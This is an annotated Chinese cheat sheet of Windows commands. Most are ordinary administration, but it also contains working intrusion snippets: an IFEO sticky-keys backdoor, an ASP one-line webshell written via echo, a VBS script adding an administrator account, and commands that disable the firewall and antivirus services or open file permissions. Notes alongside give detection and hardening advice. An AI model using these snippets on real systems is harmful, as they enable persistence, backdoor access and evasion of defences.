1:CMD下修改IP地址
c:\netsh c:\netsh>interface c:\netsh\interface>ip c:\netsh\interface\ip>dump 显示配置情况
netsh -c interface ip dump >c:\ip.txt 导出当前IP配置
netsh interface ip dump >c:\ip.txt
netsh -f c:\ip.txt 从文件导入配置
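2:tasklist /svc 任务列表(含每个进程承载的服务)
3:taskkill TASKKILL /F /IM notepad.exe /IM mspaint.exe 按映像名强制结束进程
4:systeminfo 显示系统详细信息 set 显示环境变量
5:shutdown -r -a (-r 重启;-a 取消已计划的关机)
6:iisreset /reboot (注意:/reboot 会重启整台计算机,而不只是 IIS 服务)
7:reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t reg_sz /d C:\WINDOWS\system32\taskmgr.exe /f 映像劫持(IFEO):给 sethc.exe 设置 debugger 值。该键是常见的持久化位置,排查主机时应审计 Image File Execution Options 下各子键是否存在非预期的 debugger 值
8:ntsd -c q -p PID 强制结束进程
9:syskey 增强密码安全性(对 SAM 数据库加密;新版 Windows 已移除该工具)
10:net stop sharedaccess /y net stop alg /y 停止防火墙服务(SharedAccess)和应用层网关服务(ALG);服务停止会记入系统日志的服务控制管理器事件,可据此排查防火墙被关闭的时间
11:cacls c:\windows\system32\net.exe /t /e /c /G everyone:F 设置权限(/G 授予权限,此处给 Everyone 完全控制) cacls c:\windows\system32\cmd.exe /e /c /P guest:F (/P 替换指定用户的权限,此处给 guest 完全控制)。注意这两条是放开而非收紧权限;加固时应改用 /D 拒绝或 /R 撤销相应账户的访问
12:禁用cmd Windows Registry Editor Version 5.00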
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System] "DisableCMD"=dword:00000001
13:加密cmd [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor\AutoRun ---------------------- title
set pass=0 set times=0 echo
:start set /p pass=Please input the password: if %pass%==yourpass goto ok if %times%==0 goto end set /A times=%times%-1 :end exit cls :ok title =====================
14:net view 查看工作组的电脑
15:tftp -i 192.168.1.88 get 1.txt tftp传输文件 端口udp69
16:netstat -nab 端口详情(-b 显示占用端口的程序)
17:echo ^<^%eval request(chr(35))%^> >d:\web\ma.asp echo ^<^%execute request(a)%^> 写一句话(即一句话木马;排查时可在 Web 目录中搜索含 eval request / execute request 的脚本文件)
18:msc lusrmgr.msc-本机用户和组 gpedit.msc--组策略 secpol.msc 本地安全策略 services.msc 服务
19:regsvr32 (用于加固 IIS/ASP 环境;卸载前应确认站点程序不依赖这些组件)
1、卸载wscript.shell对象 在cmd下运行:regsvr32 WSHom.Ocx /u
2、卸载FSO对象 在cmd下运行:regsvr32.exe scrrun.dll /u
3、卸载stream对象 在cmd下运行: regsvr32 /s /u "C:\Program Files\Common Files\System\ado\msado15.dll"
4、禁止使用Shell.Application组件 regsvr32.exe shell32.dll /u
恢复的话,去掉/u就行了 /s 安静模式
20:vbs加账号(创建本地账户 webadmin 并加入 Administrators 组;排查时关注安全日志中的账户创建与本地组成员变更事件,新版 Windows 为 4720、4732,需已启用账户管理审核)
---------------------------------------------- set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) Set oe=GetObject(os&"/Administrators,group") Set od=ob.Create("user","webadmin") od.SetPassword "pass" od.SetInfo Set of=GetObject(os&"/webadmin",user) oe.add os&"/webadmin" -------------------------------------------------
21:vbs列网站目录
---------------------------------------------------- Set ObjService=GetObject("IIS://LocalHost/W3SVC") For Each obj3w In objservice If IsNumeric(obj3w.Name) Then sServerName=Obj3w.ServerComment Set webSite = GetObject("IIS://Localhost/W3SVC/" & obj3w.Name & "/Root") ListAllWeb = ListAllWeb & obj3w.Name & String(25-Len(obj3w.Name)," ") & obj3w.ServerComment & "(" & webSite.Path & ")" & vbCrLf
End If Next WScript.Echo ListAllWeb Set ObjService=Nothing WScript.Quit
---------------------------------------------------------
22:arp -a 查看ARP缓存 arp -s 192.168.1.1 00-1a-a2-86-01-80 添加静态IP-MAC绑定
23:tracert 192.168.1.1 路由跟踪
24:sc 配置服务 sc getkeyname "Rising Process Communication Center" 返回服务键名 RsCCenter sc getkeyname "Rising RealTime Monitor" 返回服务键名 RsRavMon sc query servername sc config RsCCenter start= DEMAND | DISABLED | AUTO(三选一) sc config RsRavMon start= DEMAND (把安全软件服务改为手动或禁用后,开机不再自动运行;排查时应核对这些服务的启动类型)
25: regedit读3389端口 regedit /e port.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" 然后 type port.reg | find "PortNumber" (导出的 PortNumber 为十六进制 dword,默认端口 3389 即 d3d)
26:mstsc /console /v:ip:端口 超过最大连接数时连接控制台会话(新版 mstsc 中 /console 已由 /admin 取代) mstsc /console /v:192.168.1.88:2008